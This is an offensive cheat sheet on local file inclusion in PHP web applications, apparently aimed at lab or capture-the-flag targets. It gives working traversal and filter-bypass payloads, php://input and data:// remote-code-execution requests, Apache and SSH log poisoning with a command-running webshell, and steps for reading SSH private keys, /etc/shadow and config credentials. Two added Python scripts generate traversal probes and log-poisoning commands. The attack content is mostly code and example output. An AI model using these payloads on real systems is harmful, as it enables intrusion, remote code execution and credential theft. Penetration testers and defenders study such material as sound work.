LOCAL FILE INCLUSION (LFI)

Basic LFI test

Path traversal — Confirm LFI exists (keep adding ../ until you reach /; extra segments are harmless on Linux)

http://$IP/page.php?file=../../../etc/passwd
Example Output
http://10.10.10.5/page.php?file=../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
admin:x:1000:1000::/home/admin:/bin/bash
(LFI CONFIRMED)

Null byte bypass (old PHP)

PHP < 5.3.4 — Bypass extension append (also needs magic_quotes_gpc=Off, which would escape the NUL; fixed in 5.3.4, so never works on PHP 7/8)

http://$IP/page.php?file=../../../etc/passwd%00
Example Output
http://10.10.10.5/page.php?file=../../../etc/passwd%00

Code appends .php: include($_GET['file'] . '.php');
Null byte terminates string early in PHP < 5.3.4
Result: reads /etc/passwd instead of /etc/passwd.php

Double encoding

Bypass basic filters — URL encode twice

http://$IP/page.php?file=%252e%252e%252f%252e%252e%252fetc/passwd
Example Output
http://10.10.10.5/page.php?file=%252e%252e%252f%252e%252e%252fetc/passwd

%25 = %, so %252e = %2e = .
The web server/PHP decode only once: the filter sees %2e%2e%2f, which contains no ../
Only works if the app decodes a second time before the include (e.g. urldecode($_GET['file'])); it is not a generic bypass
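Added example (not part of the original cheat sheet): a small Python helper that builds the plain, null-byte and double-encoded forms of the probe above for every traversal depth, models a "../" filter to show why the double-encoded form only slips past it when the application decodes a second time, and recognises a /etc/passwd hit in a response body. The host, page name, parameter name and the sample response are assumptions constructed for the example.

```python
import re
import urllib.parse

TARGET_URL = "http://10.10.10.5/page.php"   # assumed vulnerable page (not a real host)
PARAM = "file"                               # assumed vulnerable parameter


def double_encode(s: str) -> str:
    """URL-encode every byte of s twice, e.g. '../' -> '%252e%252e%252f'."""
    once = "".join("%%%02x" % b for b in s.encode())
    return urllib.parse.quote(once, safe="")


def traversal_payloads(target_file: str, max_depth: int = 8):
    """Yield (variant, depth, value) ready to paste after '?file='.

    Depth is unknown in advance, so every depth up to max_depth is tried;
    extra ../ segments are harmless on Linux once the root is reached.
    """
    rel = target_file.lstrip("/")
    for depth in range(1, max_depth + 1):
        plain = "../" * depth + rel
        yield ("plain", depth, plain)
        # PHP < 5.3.4 only: %00 cuts off an extension the code appends
        yield ("nullbyte", depth, plain + "%00")
        # only the traversal part is double-encoded; the file name stays plain
        yield ("double", depth, double_encode("../" * depth) + rel)


def naive_filter_blocks(value: str) -> bool:
    """Model of a filter that rejects the literal '../'. It runs after the
    single URL decode the web server/PHP always perform (what $_GET holds)."""
    return "../" in urllib.parse.unquote(value)


def app_decodes_again(value: str) -> str:
    """Model of an application that calls urldecode() on $_GET['file'] after
    the filter: this second decode is what turns %2e%2e%2f back into ../."""
    return urllib.parse.unquote(urllib.parse.unquote(value))


# One /etc/passwd record: name:pw:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^\n]*$", re.M)


def looks_like_passwd(body: str) -> bool:
    """True when the response carries the root entry or several passwd records."""
    return "root:x:0:0:" in body or len(PASSWD_LINE.findall(body)) >= 3


def probe_url(value: str) -> str:
    """Full URL for one payload; value is already encoded as it must be sent."""
    return f"{TARGET_URL}?{PARAM}={value}"


# Constructed response (not captured from any host) so the detector runs offline.
SAMPLE_HIT = """<html><body><pre>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
</pre></body></html>"""


if __name__ == "__main__":
    for variant, depth, value in traversal_payloads("/etc/passwd", max_depth=3):
        print(f"{variant:8} depth={depth} filtered={naive_filter_blocks(value)} {probe_url(value)}")
    print("sample body is /etc/passwd:", looks_like_passwd(SAMPLE_HIT))
```

Feed each probe_url() to curl or a requests session and run looks_like_passwd() over the body; the first depth that hits tells you where the web root sits relative to /.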

PHP wrapper - base64 read

Read PHP source code — See credentials in config (the file comes back base64-encoded instead of being executed; works with allow_url_include=Off; resource= also takes ../ paths)

http://$IP/page.php?file=php://filter/convert.base64-encode/resource=config.php
Example Output
http://10.10.10.5/page.php?file=php://filter/convert.base64-encode/resource=config.php

PD9waHAKJGRiX2hvc3QgPSAnbG9jYWxob3N0JzsK...

base64 -d:
<?php
$db_host = 'localhost';
$db_user = 'admin';
$db_pass = 'SuperSecret123';

PHP wrapper - command exec

RCE via php://input — Direct command execution (needs allow_url_include=On; the POST body is what gets included)

curl "http://$IP/page.php?file=php://input" -d '<?php system("id"); ?>'
Example Output
curl "http://10.10.10.5/page.php?file=php://input" -d '<?php system("id"); ?>'

uid=33(www-data) gid=33(www-data) groups=33(www-data)
(RCE CONFIRMED via php://input)

PHP data wrapper

RCE via data:// — base64 of <?php system($_GET['cmd']);?> (needs allow_url_include=On; URL-encode the base64 if it contains +, since + in a query string decodes to a space)

http://$IP/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
Example Output
http://10.10.10.5/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id

base64 decodes to: <?php system($_GET['cmd']);?>
Response: uid=33(www-data)
(RCE via data:// wrapper)

Log poisoning (Apache)

Inject PHP into logs, include log — RCE via log file
Needs the log readable by the web user (Debian: /var/log/apache2 is root:adm 750, so often it is not; RHEL/CentOS path is /var/log/httpd/access_log)
Keep single quotes inside the PHP: Apache writes " into the log as \", which turns the payload into a parse error and breaks every later include of that log

curl -A "<?php system(\$_GET['cmd']); ?>" http://$IP/
then: http://$IP/page.php?file=/var/log/apache2/access.log&cmd=id
Example Output
Step 1: curl -A "<?php system(\$_GET['cmd']); ?>" http://10.10.10.5/
Step 2: http://10.10.10.5/page.php?file=/var/log/apache2/access.log&cmd=id

... uid=33(www-data) gid=33(www-data) ...
(RCE via log poisoning)

Log poisoning (SSH)

Inject PHP via SSH username — Alternative log poisoning
sshd logs the rejected name ("Invalid user ... from"); /var/log/auth.log is usually root:adm 640, so it must be readable by the web user; keep the payload short, long usernames are truncated in the log

ssh -l "<?php system(\$_GET['cmd']); ?>" $IP
then include /var/log/auth.log
Example Output
ssh -l "<?php system(\$_GET['cmd']); ?>" 10.10.10.5
Permission denied

But PHP code is now in /var/log/auth.log
http://10.10.10.5/page.php?file=/var/log/auth.log&cmd=id
uid=33(www-data)
(RCE via SSH log poisoning)
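Added example (not part of the original cheat sheet) for both log-poisoning sections above: it models Apache's log escaping (a " in the User-Agent is written as \", per the mod_log_config docs) to reject payloads that would be mangled into a parse error and wedge the log, emits the curl and ssh commands for step 1 and the include URL for step 2, and scans log text for the injected PHP so you can confirm it arrived intact before including the file. The host, page name and both log excerpts are assumptions constructed for the example.

```python
import re
import shlex

TARGET = "10.10.10.5"                          # assumed target (not a real host)
PAGE = "page.php"                              # assumed vulnerable page
WEBSHELL = "<?php system($_GET['cmd']); ?>"    # single quotes inside on purpose


def apache_log_escape(s: str) -> str:
    """Model of how mod_log_config writes %{User-Agent}i: '"' becomes \\",
    '\\' becomes \\\\ and non-printables become \\xhh (per the Apache docs)."""
    out = []
    for ch in s:
        if ch == '"':
            out.append('\\"')
        elif ch == "\\":
            out.append("\\\\")
        elif not ch.isprintable():
            out.append("\\x%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def payload_is_safe(php: str) -> bool:
    """The PHP must come back out of the log unchanged and with balanced tags;
    a payload mangled into a parse error breaks every later include of that
    log, and the log cannot be cleaned from the web side."""
    return (apache_log_escape(php) == php
            and php.count("<?php") == php.count("?>"))


def apache_poison_cmd(php: str = WEBSHELL, host: str = TARGET) -> str:
    """Step 1 (Apache): send the PHP as the User-Agent so it lands in access.log."""
    if not payload_is_safe(php):
        raise ValueError("payload would not survive the log")
    return f"curl -A {shlex.quote(php)} http://{host}/"


def ssh_poison_cmd(php: str = WEBSHELL, host: str = TARGET) -> str:
    """Step 1 (sshd): the rejected username is echoed into auth.log."""
    if not payload_is_safe(php):
        raise ValueError("payload would not survive the log")
    return f"ssh -l {shlex.quote(php)} {host}"


def include_url(log_path: str, cmd: str, host: str = TARGET) -> str:
    """Step 2: include the poisoned log and pass the command in ?cmd=."""
    return f"http://{host}/{PAGE}?file={log_path}&cmd={cmd}"


PHP_TAG = re.compile(r"<\?php.*?\?>")


def find_php_in_log(log_text: str):
    """(line number, snippet) for every PHP block in the log, so you can see
    whether the code arrived intact before including the file."""
    return [(n, m.group(0))
            for n, line in enumerate(log_text.splitlines(), 1)
            for m in PHP_TAG.finditer(line)]


def access_log_line(user_agent: str) -> str:
    """Constructed combined-format line with the UA escaped the way Apache does."""
    return ('10.10.14.3 - - [01/Jan/2024:12:00:05 +0000] "GET / HTTP/1.1" 200 612 "-" '
            f'"{apache_log_escape(user_agent)}"')


# Constructed log excerpts (not captured from any host): line 3 shows what the
# double-quoted payload turns into after Apache escapes it.
ACCESS_LOG = "\n".join([
    access_log_line("Mozilla/5.0"),
    access_log_line(WEBSHELL),
    access_log_line('<?php system($_GET["cmd"]); ?>'),
]) + "\n"
AUTH_LOG = ("Jan  1 12:00:10 web sshd[1234]: Invalid user " + WEBSHELL
            + " from 10.10.14.3 port 51234\n")


if __name__ == "__main__":
    print(apache_poison_cmd())
    print(include_url("/var/log/apache2/access.log", "id"))
    print(ssh_poison_cmd())
    print(include_url("/var/log/auth.log", "id"))
    for n, snippet in find_php_in_log(ACCESS_LOG) + find_php_in_log(AUTH_LOG):
        print(n, snippet, "OK" if snippet == WEBSHELL else "MANGLED")
```

If you can read the log through the LFI before poisoning it (php://filter works here too), run find_php_in_log() over it first: an earlier broken attempt already in the file means every include will fail regardless of what you add now.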

Read SSH keys

Steal private keys — SSH access (also try id_ed25519 and id_ecdsa; keys made by newer OpenSSH start with -----BEGIN OPENSSH PRIVATE KEY-----)

http://$IP/page.php?file=../../../home/<user>/.ssh/id_rsa
Example Output
http://10.10.10.5/page.php?file=../../../home/admin/.ssh/id_rsa

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA...
-----END RSA PRIVATE KEY-----

Save to file, chmod 600, ssh -i id_rsa admin@target
(LFI to SSH key = instant foothold)

Read /etc/shadow (if root)

Password hashes — Crack with hashcat/john (only readable when the web server runs as root; $6$ = sha512crypt, hashcat -m 1800; $1$ = md5crypt, -m 500; $y$ = yescrypt, use john)

http://$IP/page.php?file=../../../etc/shadow
Example Output
http://10.10.10.5/page.php?file=../../../etc/shadow

root:$6$abc123$LongHashHere:19000:0:99999:7:::
admin:$6$def456$AnotherHash:19000:0:99999:7:::
(Copy hashes, crack with hashcat -m 1800)

Common files to read

Sensitive file targets — Creds, users, config

/etc/passwd
/etc/shadow
/etc/hosts
/home/<user>/.bash_history
/proc/self/environ
/var/www/html/config.php
/var/www/html/.htpasswd
/etc/apache2/sites-enabled/000-default.conf
Example Output
/etc/passwd -> usernames and home directories (which users have /bin/bash)
/etc/shadow -> password hashes (if readable)
/home/user/.ssh/id_rsa -> SSH private key
/var/www/html/config.php -> DB credentials (read via php://filter, a plain include executes it)
/proc/self/environ -> environment variables of the web process, may hold secrets
~/.bash_history -> command history with passwords
/etc/apache2/sites-enabled/000-default.conf -> web root and vhost paths for further reads

Windows LFI paths

Windows file targets — Windows path format (forward slashes work too; if backslashes are stripped, try %5c)

..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\win.ini
..\..\..\inetpub\wwwroot\web.config
Example Output
..\..\..\windows\system32\drivers\etc\hosts
 -> 127.0.0.1 localhost
..\..\..\inetpub\wwwroot\web.config
 -> <connectionStrings><add name="db" connectionString="Server=.;Database=app;User Id=sa;Password=DBp@ss" /></connectionStrings>
..\..\..\windows\win.ini
 -> [fonts] (confirms LFI on Windows)